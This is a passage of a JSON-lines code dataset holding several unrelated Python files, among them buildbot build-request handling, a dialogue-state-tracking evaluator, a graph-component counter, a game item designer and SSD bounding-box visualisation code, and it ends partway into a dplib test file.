build master\n        @param brdict: build request dictionary\n\n        @returns: L{BuildRequest}, via Deferred\n        \"\"\"\n        cache = master.caches.get_cache(\"BuildRequests\", cls._make_br)\n        return cache.get(brdict['brid'], brdict=brdict, master=master)\n\n    @classmethod\n    @defer.inlineCallbacks\n    def _make_br(cls, brid, brdict, master):\n        buildrequest = cls()\n        buildrequest.id = brid\n        buildrequest.bsid = brdict['buildsetid']\n        buildrequest.buildername = brdict['buildername']\n        buildrequest.priority = brdict['priority']\n        dt = brdict['submitted_at']\n        buildrequest.submittedAt = dt and calendar.timegm(dt.utctimetuple())\n        buildrequest.master = master\n\n        # fetch the buildset to get the reason\n        buildset = yield master.db.buildsets.getBuildset(brdict['buildsetid'])\n        assert buildset # schema should guarantee this\n        buildrequest.reason = buildset['reason']\n\n        # fetch the buildset properties, and convert to Properties\n        buildset_properties = yield master.db.buildsets.getBuildsetProperties(brdict['buildsetid'])\n\n        buildrequest.properties = properties.Properties.fromDict(buildset_properties)\n\n        # fetch the sourcestamp dictionary\n        sslist = yield master.db.sourcestamps.getSourceStamps(buildset['sourcestampsetid'])\n        assert len(sslist) > 0, \"Empty sourcestampset: db schema enforces set to exist but cannot enforce a non-empty set\"\n\n        # and turn them into SourceStamps\n        buildrequest.sources = {}\n\n        def store_source(source):\n            buildrequest.sources[source.codebase] = source\n\n        dlist = []\n        for ssdict in sslist:\n            d = sourcestamp.SourceStamp.fromSsdict(master, ssdict)\n            d.addCallback(store_source)\n            dlist.append(d)\n\n        yield defer.gatherResults(dlist)\n\n        if buildrequest.sources:\n            buildrequest.source = buildrequest.sources.values()[0]\n\n        defer.returnValue(buildrequest)\n\n    def requestsHaveSameCodebases(self, other):\n        self_codebases = set(self.sources.iterkeys())\n        other_codebases = set(other.sources.iterkeys())\n        return self_codebases == other_codebases\n\n    def requestsHaveChangesForSameCodebases(self, other):\n        # Merge can only be done if both requests have sourcestampsets containing\n        # comparable sourcestamps, that is, sourcestamps with the same codebase.\n        # This means that both requests must have exactly the same set of codebases.\n        # If not, the merge cannot be performed.\n        # The second requirement is that both requests have the changes in the\n        # same codebases.\n        #\n        # Normally a scheduler always delivers the same set of codebases:\n        # sourcestamps with and without 
changes\n        # In the case where a scheduler is not configured with a set of codebases,\n        # it delivers only a set with sourcestamps that have changes.\n        self_codebases = set(self.sources.iterkeys())\n        other_codebases = set(other.sources.iterkeys())\n        if self_codebases != other_codebases:\n            return False\n\n        for c in self_codebases:\n            # Check that either both or neither have changes\n            if ((len(self.sources[c].changes) > 0)\n                    != (len(other.sources[c].changes) > 0)):\n                return False\n        # all codebases tested, no differences found\n        return True\n\n    def canBeMergedWith(self, other):\n        \"\"\"\n        Returns whether both requests can be merged\n        \"\"\"\n\n        if not self.requestsHaveChangesForSameCodebases(other):\n            return False\n\n        # get codebases from self; they are equal to other's\n        self_codebases = set(self.sources.iterkeys())\n\n        for c in self_codebases:\n            # check to prevent exception\n            if c not in other.sources:\n                return False\n            if not self.sources[c].canBeMergedWith(other.sources[c]):\n                return False\n        return True\n\n    def mergeSourceStampsWith(self, others):\n        \"\"\" Returns one merged sourcestamp for every codebase \"\"\"\n        # get all codebases from all requests\n        all_codebases = set(self.sources.iterkeys())\n        for other in others:\n            all_codebases |= set(other.sources.iterkeys())\n\n        all_merged_sources = {}\n        # walk along the codebases\n        for codebase in all_codebases:\n            all_sources = []\n            if codebase in self.sources:\n                all_sources.append(self.sources[codebase])\n            for other in others:\n                if codebase in other.sources:\n                    all_sources.append(other.sources[codebase])\n            assert len(all_sources) > 0, \"each codebase should have at least one sourcestamp\"\n            all_merged_sources[codebase] = all_sources[0].mergeWith(all_sources[1:])\n\n        return [source for source in all_merged_sources.itervalues()]\n\n    def mergeReasons(self, others):\n        \"\"\"Return a reason for the merged build request.\"\"\"\n        reasons = []\n        for req in [self] + others:\n            if req.reason and req.reason not in reasons:\n                reasons.append(req.reason)\n        return \", \".join(reasons)\n\n    def getSubmitTime(self):\n        return self.submittedAt\n\n    @defer.inlineCallbacks\n    def cancelBuildRequest(self):\n        # first, try to claim the request; if this fails, then it's too late to\n        # cancel the build anyway\n        try:\n            yield self.master.db.buildrequests.claimBuildRequests([self.id])\n        except buildrequests.AlreadyClaimedError:\n            log.msg(\"build request already claimed; cannot cancel\")\n            return\n\n        # then complete it with 'FAILURE'; this is the closest we can get to\n        # cancelling a request without running into trouble with dangling\n        # references.\n        yield self.master.db.buildrequests.completeBuildRequests([self.id],\n                                                                 FAILURE)\n\n        # and let the master know that the enclosing buildset may be complete\n        yield self.master.maybeBuildsetComplete(self.bsid)\n\n\nclass BuildRequestControl:\n    implements(interfaces.IBuildRequestControl)\n\n    def __init__(self, builder, request):\n        self.original_builder = builder\n        self.original_request = request\n        self.brid = request.id\n\n    def subscribe(self, observer):\n        raise NotImplementedError\n\n    def unsubscribe(self, observer):\n        raise NotImplementedError\n\n    def cancel(self):\n        d = self.original_request.cancelBuildRequest()\n        d.addErrback(log.err, 'while cancelling build request')\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/process/buildrequest.py","file_name":"buildrequest.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"}
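A note on the buildrequest.py record above: its merge test (requestsHaveChangesForSameCodebases plus canBeMergedWith) reduces to two per-codebase checks: identical codebase sets, and matching has-changes status. A minimal standalone sketch of that pattern, with plain dicts standing in for buildbot's source-stamp objects (the names below are illustrative assumptions, not part of the record):

    def can_merge(a, b):
        # Both requests must cover exactly the same set of codebases.
        if set(a) != set(b):
            return False
        # For each codebase, either both or neither request may carry changes.
        return all(bool(a[c]['changes']) == bool(b[c]['changes']) for c in a)

    print(can_merge({'lib': {'changes': [1]}}, {'lib': {'changes': [2]}}))  # True
    print(can_merge({'lib': {'changes': [1]}}, {'lib': {'changes': []}}))   # False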
+{"seq_id":"7034168278","text":"\"\"\" evaluate.py: evaluates the model \"\"\"\n\nimport argparse\nimport logging\nimport os\n\nimport numpy as np\nimport torch\nimport utils\n\nfrom model.DSTModel import DST\nfrom model.DSTModel import get_slot_predictions\nfrom model.data_loader import DialoguesDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import trange\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--data_dir', default='./data')\nparser.add_argument('--data_filename')\nparser.add_argument('--model_dir', default='./experiments')\nparser.add_argument('--model_checkpoint_name', default='best.pth.tar')\n\ndef get_filled_slot_dict(candidates, slot_predictions):\n \"\"\" get_filled_slot_dict: returns a dictionary representing slot predictions by the model\n @ param candidates (List[String]): list of candidates (strings)\n @ param slot_prediction (List[Tensor]): List of tensors with output predictions for each slot for\n each cand\n @ returns slots_to_predval (Dict): dictionary mapping each slot to a candidate (according to\n predictions)\n \"\"\"\n slots_to_predval = {}\n for cand, slot_prediction in zip(candidates, slot_predictions):\n pos_class_index = [idx for idx, val in enumerate(slot_prediction) if val == 1]\n for index in pos_class_index:\n slots_to_predval[index] = cand\n return slots_to_predval\n\n\ndef calc_slot_accuracy(predicted_slot_dict, gt_slot_dict, num_of_slots):\n \"\"\" calc_slot_accuracy: based on predictions of the model and gt slot values, the method\n calculates a number of accuracy metrics.\n\n example calculation:\n\n num_of_slots = 35\n\n gt_slot_dict = {\n 0 : \"indian\",\n 3 : \"cheap\"\n 7 : \"far\"\n }\n\n predicted_slots = {\n 0 : \"indian\",\n 3 : \"expensive\"\n 2 : \"6:50\"\n }\n\n fp = 2, tp = 1, fn = 1\n\n slot_accuracy = (num_of_slots - 2) / num_of_slots = 33/35\n slot_precision = (tp) / (tp + fp) = 1/3\n slot_recall = tp / (tp + fn)\n join_goal_acc = 1 if tp == len(gt_slot_dict) and fp == 0 else 0\n \"\"\"\n tp, fp, fn = 0, 0, 0\n total_gt_slots = len(gt_slot_dict)\n\n for slot_id, pred in predicted_slot_dict.items():\n if slot_id in gt_slot_dict.keys():\n if pred == gt_slot_dict[slot_id]:\n tp += 1\n else:\n fp += 1\n else:\n fp += 1\n\n for slot_id, _ in gt_slot_dict.items():\n if slot_id not in predicted_slot_dict.keys():\n fn += 1\n\n # of the total slots = 35, how many were correctly predicted\n slot_accuracy = (num_of_slots - fp - fn)/num_of_slots\n slot_precision = tp / (tp + fp) if (tp + fp) != 0 else 0\n slot_recall = tp / (tp + fn) if ((tp + fn)) != 0 else 0\n slot_f1 = 2 * (slot_precision * slot_recall) / (slot_precision + slot_recall) if (slot_precision + slot_recall) != 0 else 0\n # joing goal accuracy: measures whether all slots are predicted correctly\n joint_goal_acc = 1 if (gt_slot_dict == predicted_slot_dict) else 0\n\n return slot_accuracy, joint_goal_acc, slot_precision, slot_recall, slot_f1\n\n\ndef evaluate(model, evaluation_data, model_dir, dataset_params, device):\n \"\"\" Evaluates the model over the evaluation data \"\"\"\n\n #batch_size = dataset_params['eval_batch_size']\n batch_size=1\n num_of_slots = dataset_params['num_of_slots']\n\n # set model in evaluation model\n model.eval()\n\n # set up validation_generator --> data iterator wich generates batches for the entire dataset\n validation_generator = evaluation_data.data_iterator(batch_size=batch_size, shuffle=False, 
is_train=False)\n\n total_loss_eval = 0\n joint_goal_acc_sum = 0\n avg_goal_acc_sum = 0\n slot_precision_sum = 0\n slot_recall_sum = 0\n slot_f1_sum = 0\n\n num_of_steps = evaluation_data.__len__() // batch_size\n\n # no loss weightage in eval step\n pos_weights = torch.tensor([1.0] * num_of_slots, device=device)\n loss_func = nn.BCEWithLogitsLoss(pos_weight=pos_weights, reduction='none')\n # summary for current eval loop\n summ = []\n\n t = trange(num_of_steps)\n\n for i in t:\n try:\n # here each data point is a turn\n turn, turn_label = next(validation_generator)\n candidates = turn['candidates']\n\n context_vector = model.get_turncontext(turn)\n context_vector_formatted = torch.cat(len(candidates)*[context_vector]).unsqueeze(dim=1)\n output = model.feed_forward(context_vector_formatted, candidates)\n output = output.squeeze(dim=1)\n\n # 1) Compute loss\n # need to weightage in evaluation\n loss = loss_func(output, turn_label)\n # 2) Compute summary statistics\n\n # get the gt slot values\n gt_slot_values_dict = turn['slots_filled']\n\n # get the output generated slot values\n slot_predictions = get_slot_predictions(output)\n predicted_slot_dict = get_filled_slot_dict(candidates, slot_predictions)\n slot_accuracy, joint_goal_acc, slot_precision, slot_recall, slot_f1 = calc_slot_accuracy(predicted_slot_dict, gt_slot_values_dict, num_of_slots)\n\n joint_goal_acc_sum += joint_goal_acc\n avg_goal_acc_sum += slot_accuracy\n slot_precision_sum += slot_precision\n slot_recall_sum += slot_recall\n slot_f1_sum += slot_f1\n\n batch_loss = loss.sum().item()\n\n summary_batch = {\n 'batch_loss' : batch_loss,\n 'slot_goal_accuracy' : slot_accuracy,\n 'joint_goal_accuracy' : joint_goal_acc,\n 'slot_precision' : slot_precision,\n 'slot_recall' : slot_recall,\n 'slot_f1' : slot_f1\n }\n summ.append(summary_batch)\n\n\n # add to total loss\n total_loss_eval += batch_loss\n\n # no more batches left\n except StopIteration:\n break\n\n avg_turn_loss = total_loss_eval/(num_of_steps)\n joint_goal_acc = joint_goal_acc_sum/(num_of_steps)\n avg_goal_acc = avg_goal_acc_sum/(num_of_steps)\n avg_slot_precision = slot_precision_sum/(num_of_steps)\n\n\n metrics_mean = {metric:np.mean([x[metric] for x in summ if x[metric] is not None]) for metric in summ[0]}\n metrics_string = \" ; \".join(\"{}: {:05.3f}\".format(k, v) for k, v in metrics_mean.items())\n logging.info(\"- Eval metrics : \" + metrics_string)\n logging.info(\"Average Evaluation Loss: {}\".format(avg_turn_loss))\n logging.info(\"Total eval loss: {}\".format(total_loss_eval))\n logging.info(\"Joint goal accuracy: {}\".format(joint_goal_acc))\n logging.info(\"Average goal accuracy: {}\".format(avg_goal_acc))\n logging.info(\"Average slot precision: {}\".format(avg_slot_precision))\n\n return metrics_mean, total_loss_eval, avg_goal_acc, joint_goal_acc, avg_slot_precision\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n\n # device\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n # load in evaluation data\n data_path = os.path.join(args.data_dir, args.data_filename)\n print(data_path)\n assert os.path.isfile(data_path)\n evaluation_data = DialoguesDataset(data_path, device=device)\n\n # model param file\n param_path = os.path.join(args.model_dir, 'params.json')\n print(param_path)\n assert os.path.isfile(param_path)\n params = utils.read_json_file(param_path)\n\n model_params = {\n 'embed_dim' : 300,\n 'sentence_hidden_dim' : params['sentence_hidden_dim'],\n 'hierarchial_hidden_dim' : 
params['hierarchial_hidden_dim'],\n        'da_hidden_dim' : params[ 'da_hidden_dim'],\n        'da_embed_size' : 50,\n        'ff_hidden_dim' : params['ff_hidden_dim'],\n        'ff_dropout_prob' : params[ 'ff_dropout_prob'],\n        'batch_size' : params['batch_size'],\n        'num_slots' : 35,\n        'ngrams' : ['3'],\n        'candidate_utterance_vocab_pth' : 'mst_attraction_vocab.json',\n        'da_vocab_pth': 'mst_attraction_davocab.json',\n        'device' : device\n    }\n\n    training_params = {\n        'num_epochs' : 10,\n        'learning_rate' : params['learning_rate'],\n        'pos_weighting' : 20.0\n    }\n\n    dataset_params = {\n        'train_batch_size': params['batch_size'],\n        'eval_batch_size' : 1,\n        'shuffle': True,\n        'num_workers': 1,\n        'num_of_slots' : 35\n\n    }\n    # model\n    if torch.cuda.is_available():\n        model = DST(**model_params).cuda()\n    else:\n        model = DST(**model_params)\n\n    utils.set_logger(os.path.join(args.model_dir, 'eval.log'))\n\n    logging.info('Starting evaluation')\n\n    utils.load_checkpoint(os.path.join(args.model_dir, args.model_checkpoint_name), model)\n\n    eval_metrics, total_loss_eval, eval_avg_goal_acc, eval_joint_goal_acc, avg_slot_precision = evaluate(model, evaluation_data, args.model_dir, dataset_params, device)\n\n    save_path = os.path.join(args.model_dir, \"metrics_test.json\")\n    utils.save_to_json(eval_metrics, save_path)\n\n\n\n\n","repo_name":"ANarayan/DAMSL-CS224N-FinalProject","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10105376341","text":"import sys \r\n\r\n# Lift the recursion depth limit (default 1000); without this, a RecursionError occurs\r\nsys.setrecursionlimit(10000)\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\n\r\ngraph = [[] for _ in range(n+1)]\r\ngraph[0] = [0,0]\r\nvisited = [False for _ in range(n+1)]\r\n\r\ncount = 0\r\n\r\nfor _ in range(m):\r\n    start, end = map(int, sys.stdin.readline().split())\r\n    \r\n    graph[start].append(end)\r\n    graph[end].append(start)\r\n    # sort\r\n    graph[start].sort()\r\n    graph[end].sort()\r\n\r\ndef DFS(graph, start, visited):\r\n    visited[start] = True\r\n\r\n    for i in graph[start]:\r\n        if not visited[i]:\r\n            DFS(graph, i, visited)\r\n\r\nfor i in range(1, len(visited)):\r\n    if visited[i] == False:\r\n        count += 1\r\n        DFS(graph, i, visited)\r\n\r\nprint(count)\r\n\r\n## Reference: https://kyoung-jnn.tistory.com/entry/%EB%B0%B1%EC%A4%8011724%EB%B2%88%ED%8C%8C%EC%9D%B4%EC%8D%ACPython-%EC%97%B0%EA%B2%B0-%EC%9A%94%EC%86%8C%EC%9D%98-%EA%B0%9C%EC%88%98-DFS","repo_name":"chanmeee/algorithm","sub_path":"백준/Silver/11724.연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29468528866","text":"import os\nfrom definitions import clear\nfrom definitions import davacis \nfrom definitions import filePath\nfrom loggingConfig import initLogger\ninitLogger(filePath)\ndef openItemDesigner(filePath):\n    weapon = {}\n    itemPath = f\"{filePath}/items\"\n    itemName = str(input(\"What do you want to call the item?\\n>\"))\n    weapon.update(damage = chooseWeaponDamage(chooseItemType()))\n    weapon.update(rarity = chooseItemRarity())\n    weapon.update(statReqs = chooseStatReqs(davacis))\n    weapon.update(value = chooseWeaponValue())\n    weapon.update(allowTraits = chooseTraitAllow()) \n    weapon.update(isUnique = chooseWeaponUnique())\n    print(weapon)\ndef chooseItemType():\n    types = [\"weapons\",\"armour\",\"misc\"]\n    try:\n        type = types[int(input(\"\"\"\n    What type of item do 
you want to make?\n    1. Weapon\n    2. Armour\n    3. Misc\\n>\"\"\")) - 1]\n    except (ValueError, IndexError):\n        print(\"Invalid Input\")\n        clear(\"d\")\n        chooseItemType()\n        return\n    return type\ndef chooseWeaponTypes():\n    Finished = False\n    while not Finished:\n        try:\n            weaponType = int(input(\"\"\"\n    What damage types should the weapon do?\n    1. Crush\n    2. Slash\n    3. Pierce\n    4. Magic\n    5. Projectile\n    6. Etherial\n    7. Go Back\n    \"\"\"))\n            if weaponType > 7 or weaponType < 1:\n                raise IndexError\n        except (ValueError, IndexError):\n            print(\"Invalid Input\")\n            clear(\"d\")\n            chooseWeaponTypes()\n            return\n        if weaponType == 7: # weaponType is an int; comparing against the string \"7\" never matched\n            Finished = True\n            break\n        finish = str(input(\"Do you want to add more damage types?\\n1. Yes\\n 2. No\\n>\"))\n        if finish == \"2\":\n            Finished = True \n            break\n        else:\n            pass\ndef chooseWeaponDamage(weaponType):\n    types = [\"crush\",\"slash\",\"pierce\",\"magic\",\"projectile\",\"etherial\"]\n    Valid = False\n    while not Valid:\n        try:\n            weaponDamageVals = [int(input(f\"What is the least {types[weaponType].capitalize()} damage should the weapon do?\\n>\")), int(input(f\"What is the most {types[weaponType].capitalize()} damage should the weapon do?\\n>\"))]\n            Valid = True\n        except ValueError:\n            print(\"Invalid Input\")\n            clear(\"d\")\n            chooseWeaponDamage(weaponType)\n            return\n    weaponDamageDict = {} \n    # weaponType is treated as a single index into types (the original loop rewrote the same key on every pass)\n    weaponDamageDict[types[weaponType]] = weaponDamageVals\n    return weaponDamageDict\ndef chooseItemRarity():\n    raritys = [\"common\",\"uncommon\",\"rare\",\"epic\",\"legendary\",\"mythical\",\"unobtainable\"]\n    try:\n        itemRarity = raritys[int(input(\"\"\"Choose a rarity:\n    1. Common\n    2. Uncommon\n    3. Rare\n    4. Epic\n    5. Legendary\n    6. Mythical\n    7. Unobtainable\n    >\"\"\")) - 1]\n        return itemRarity \n    except (ValueError, IndexError):\n        print(\"Invalid Input\")\n        clear(\"d\")\n        chooseItemRarity()\n\ndef chooseStatReqs(davacis):\n    statCat = [];statCatDict = {};statsReq = set()\n    try:\n        statsReq.add(int(input(\"\"\"\n    What stat categories are needed? (input multiple numbers if needed)?\n    1. Dexterity\n    2. Agility\n    3. Vitality\n    4. Awareness\n    5. Charisma\n    6. Intelligence\n    7. Strength\"\"\")))\n        for s in statsReq: statCat.append(davacis[s - 1]) # assumes davacis lists stat names in menu order\n    except (ValueError, IndexError):\n        print(\"Invalid Input\")\n        clear(\"d\")\n        chooseStatReqs(davacis)\n        return\n    for i in range(len(statCat)):\n        try:\n            statCatNum = int(input(f\"How high should the player's {statCat[i]} be?\")) \n            statCatDict[statCat[i]] = statCatNum\n\n        except ValueError:\n            print(\"Invalid Input\")\n            clear(\"d\")\n            chooseStatReqs(davacis)\n            return\n    return statCatDict\ndef chooseWeaponValue():\n    try:\n        weaponValue = int(input(\"What should the item be worth?\\n>\"))\n    except ValueError:\n        print(\"Invalid Input\")\n        clear(\"d\")\n        chooseWeaponValue()\n        return\n    return weaponValue\ndef chooseTraitAllow():\n    try:\n        allowTraits = int(input(\"Should the weapon be allowed to have traits?\\n1. Yes\\n2. No\"))\n        allowTraits = (allowTraits == 1) # 1 = Yes, 2 = No; bool() mapped both to True\n    except ValueError:\n        print(\"Invalid Input\")\n        clear(\"d\")\n        chooseTraitAllow()\n        return\n    return allowTraits\ndef chooseWeaponUnique():\n    try:\n        isUnique = int(input(\"Is the weapon unique (excluded from standardloot)?\\n1. Yes\\n2. 
No\"))\n isUnique = bool(isUnique)\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseWeaponUnique()\n return\n","repo_name":"Oriarm1234/Davacis","sub_path":"itemMaker.py","file_name":"itemMaker.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28336953558","text":"\"\"\"Visualize bounding boxes\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport numpy as np\nimport skimage\nimport matplotlib.pyplot as plt\nimport os\nimport layer_utils\nimport label_utils\nimport math\n\nfrom skimage.io import imread\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.lines import Line2D\nfrom layer_utils import anchor_boxes, minmax2centroid, centroid2minmax\nfrom label_utils import index2class, get_box_color\n\n\ndef nms(args, classes, offsets, anchors):\n \"\"\"Perform NMS (Algorithm 11.12.1).\n\n Arguments:\n args : User-defined configurations\n classes (tensor): Predicted classes\n offsets (tensor): Predicted offsets\n \n Returns:\n objects (tensor): class predictions per anchor\n indexes (tensor): indexes of detected objects\n filtered by NMS\n scores (tensor): array of detected objects scores\n filtered by NMS\n \"\"\"\n\n # get all non-zero (non-background) objects\n objects = np.argmax(classes, axis=1)\n # non-zero indexes are not background\n nonbg = np.nonzero(objects)[0]\n\n # D and S indexes in Line 1\n indexes = []\n while True:\n # list of zero probability values\n scores = np.zeros((classes.shape[0],))\n # set probability values of non-background\n scores[nonbg] = np.amax(classes[nonbg], axis=1)\n\n # max probability given the list\n # Lines 3 and 4\n score_idx = np.argmax(scores, axis=0)\n score_max = scores[score_idx]\n \n # get all non max probability & set it as new nonbg\n # Line 5\n nonbg = nonbg[nonbg != score_idx]\n\n # if max obj probability is less than threshold (def 0.8)\n if score_max < args.class_threshold:\n # we are done\n break\n\n # Line 5\n indexes.append(score_idx)\n score_anc = anchors[score_idx]\n score_off = offsets[score_idx][0:4]\n score_box = score_anc + score_off\n score_box = np.expand_dims(score_box, axis=0)\n nonbg_copy = np.copy(nonbg)\n\n # get all overlapping predictions (Line 6)\n # perform Non-Max Suppression (NMS)\n for idx in nonbg_copy:\n anchor = anchors[idx]\n offset = offsets[idx][0:4]\n box = anchor + offset\n box = np.expand_dims(box, axis=0)\n iou = layer_utils.iou(box, score_box)[0][0]\n # if soft NMS is chosen (Line 7)\n if args.soft_nms:\n # adjust score: Line 8\n iou = -2 * iou * iou\n classes[idx] *= math.exp(iou)\n # else NMS (Line 9), (iou threshold def 0.2)\n elif iou >= args.iou_threshold:\n # remove overlapping predictions with iou>threshold\n # Line 10\n nonbg = nonbg[nonbg != idx]\n\n # Line 2, nothing else to process\n if nonbg.size == 0:\n break\n\n\n # get the array of object scores\n scores = np.zeros((classes.shape[0],))\n scores[indexes] = np.amax(classes[indexes], axis=1)\n\n return objects, indexes, scores\n\n\ndef show_boxes(args,\n image,\n classes,\n offsets,\n feature_shapes,\n show=True):\n \"\"\"Show detected objects on an image. 
Show bounding boxes\n and class names.\n\n Arguments:\n image (tensor): Image to show detected objects (0.0 to 1.0)\n classes (tensor): Predicted classes\n offsets (tensor): Predicted offsets\n feature_shapes (tensor): SSD head feature maps\n show (bool): Whether to show bounding boxes or not\n\n Returns:\n class_names (list): List of object class names\n rects (list): Bounding box rectangles of detected objects\n class_ids (list): Class ids of detected objects\n boxes (list): Anchor boxes of detected objects\n \"\"\"\n # generate all anchor boxes per feature map\n anchors = []\n n_layers = len(feature_shapes)\n for index, feature_shape in enumerate(feature_shapes):\n anchor = anchor_boxes(feature_shape,\n image.shape,\n index=index)\n anchor = np.reshape(anchor, [-1, 4])\n if index == 0:\n anchors = anchor\n else:\n anchors = np.concatenate((anchors, anchor), axis=0)\n\n # get all non-zero (non-background) objects\n # objects = np.argmax(classes, axis=1)\n # print(np.unique(objects, return_counts=True))\n # nonbg = np.nonzero(objects)[0]\n if args.normalize:\n print(\"Normalize\")\n anchors_centroid = minmax2centroid(anchors)\n offsets[:, 0:2] *= 0.1\n offsets[:, 0:2] *= anchors_centroid[:, 2:4]\n offsets[:, 0:2] += anchors_centroid[:, 0:2]\n offsets[:, 2:4] *= 0.2\n offsets[:, 2:4] = np.exp(offsets[:, 2:4])\n offsets[:, 2:4] *= anchors_centroid[:, 2:4]\n offsets = centroid2minmax(offsets)\n # convert fr cx,cy,w,h to real offsets\n offsets[:, 0:4] = offsets[:, 0:4] - anchors\n\n objects, indexes, scores = nms(args,\n classes,\n offsets,\n anchors)\n\n class_names = []\n rects = []\n class_ids = []\n boxes = []\n if show:\n fig, ax = plt.subplots(1)\n ax.imshow(image)\n yoff = 1\n for idx in indexes:\n #batch, row, col, box\n anchor = anchors[idx] \n offset = offsets[idx]\n \n anchor += offset[0:4]\n # default anchor box format is \n # xmin, xmax, ymin, ymax\n boxes.append(anchor)\n w = anchor[1] - anchor[0]\n h = anchor[3] - anchor[2]\n x = anchor[0]\n y = anchor[2]\n category = int(objects[idx])\n class_ids.append(category)\n class_name = index2class(category)\n class_name = \"%s: %0.2f\" % (class_name, scores[idx])\n class_names.append(class_name)\n rect = (x, y, w, h)\n print(class_name, rect)\n rects.append(rect)\n if show:\n color = get_box_color(category)\n rect = Rectangle((x, y),\n w,\n h,\n linewidth=2,\n edgecolor=color,\n facecolor='none')\n ax.add_patch(rect)\n bbox = dict(color='white',\n alpha=1.0)\n ax.text(anchor[0] + 2,\n anchor[2] - 16 + np.random.randint(0,yoff),\n class_name,\n color=color,\n #fontweight='bold',\n bbox=bbox,\n fontsize=10,\n verticalalignment='top')\n yoff += 50\n #t.set_bbox(dict(facecolor='red', alpha=0.5, edgecolor='red'))\n\n if show:\n plt.savefig(\"detection.png\", dpi=600)\n plt.show()\n\n return class_names, rects, class_ids, boxes\n\n\ndef show_anchors(image,\n feature_shape,\n anchors,\n maxiou_indexes=None,\n maxiou_per_gt=None,\n labels=None,\n show_grids=False):\n \"\"\"Utility for showing anchor boxes for debugging purposes\"\"\"\n image_height, image_width, _ = image.shape\n _, feature_height, feature_width, _ = feature_shape\n\n fig, ax = plt.subplots(1)\n ax.imshow(image)\n if show_grids:\n grid_height = image_height // feature_height\n for i in range(feature_height):\n y = i * grid_height\n line = Line2D([0, image_width], [y, y])\n ax.add_line(line)\n\n grid_width = image_width // feature_width\n for i in range(feature_width):\n x = i * grid_width\n line = Line2D([x, x], [0, image_height])\n ax.add_line(line)\n\n # maxiou_indexes is 
(4, n_gt)\n for index in range(maxiou_indexes.shape[1]):\n i = maxiou_indexes[1][index]\n j = maxiou_indexes[2][index]\n k = maxiou_indexes[3][index]\n # color = label_utils.get_box_color()\n box = anchors[0][i][j][k] #batch, row, col, box\n # default anchor box format is xmin, xmax, ymin, ymax\n w = box[1] - box[0]\n h = box[3] - box[2]\n x = box[0]\n y = box[2]\n # Rectangle ((xmin, ymin), width, height) \n rect = Rectangle((x, y),\n w,\n h,\n linewidth=2,\n edgecolor='y',\n facecolor='none')\n ax.add_patch(rect)\n\n if maxiou_per_gt is not None and labels is not None:\n # maxiou_per_gt[index] is row w/ max iou\n iou = np.amax(maxiou_per_gt[index])\n #argmax_index = np.argmax(maxiou_per_gt[index])\n #print(maxiou_per_gt[index])\n # offset\n label = labels[index]\n category = int(label[4])\n class_name = index2class(category)\n color = label_utils.get_box_color(category)\n bbox = dict(facecolor=color, color=color, alpha=1.0)\n ax.text(label[0],\n label[2],\n class_name,\n color='w',\n fontweight='bold',\n bbox=bbox,\n fontsize=16,\n verticalalignment='top')\n dxmin = label[0] - box[0]\n dxmax = label[1] - box[1]\n dymin = label[2] - box[2]\n dymax = label[3] - box[3]\n print(index, \":\", \"(\", class_name, \")\", iou, dxmin, dxmax, dymin, dymax, label[0], label[2])\n\n if labels is None:\n plt.show()\n\n return fig, ax\n","repo_name":"PacktPublishing/Advanced-Deep-Learning-with-Keras","sub_path":"chapter11-detection/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":9795,"program_lang":"python","lang":"en","doc_type":"code","stars":1645,"dataset":"github-code","pt":"52"} +{"seq_id":"20000802177","text":"from unittest import TestCase\nfrom datetime import datetime, timedelta\n\nfrom dplib import KPI\nfrom dplib.testing import ResultAssertions\nfrom dplib.result import Result\nimport dplib as dp\n\nNOW = datetime.now()\n\nTIMES = [NOW, NOW + timedelta(seconds=1), NOW + timedelta(seconds=2)]\nD1 = dp.Dataset({\n 'Voltage': dp.Series([1.23, 5.32, 8.19], TIMES),\n 'Current': dp.Series([0.32, -3.2, 4.2555], TIMES),\n})\n\nD2 = dp.Dataset({\n 'volts': dp.Series([1.23, 5.32, 8.19], TIMES),\n 'amps': dp.Series([0.32, -3.2, 4.2555], TIMES),\n})\n'''\nSame as D1, but with different names.\n'''\n\nID_KPI = KPI('x')\n'''\nAn identity KPI. 
